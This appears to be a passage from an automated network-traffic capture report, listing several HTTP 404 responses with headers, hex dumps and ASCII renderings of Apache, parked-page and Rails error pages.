            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 19:33:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 19:33:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 19:33:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 06 Nov 2024 19:34:04 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 06 Nov 2024 19:34:07 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 06 Nov 2024 19:34:09 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Wed, 06 Nov 2024 19:34:12 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 820f1639-7703-49a9-b928-7b8dd944ccdbx-runtime: 0.020687content-length: 17134connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: cf5e617c-69d7-4f8d-a09a-87f3e3aab378x-runtime: 0.021751content-length: 17154connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 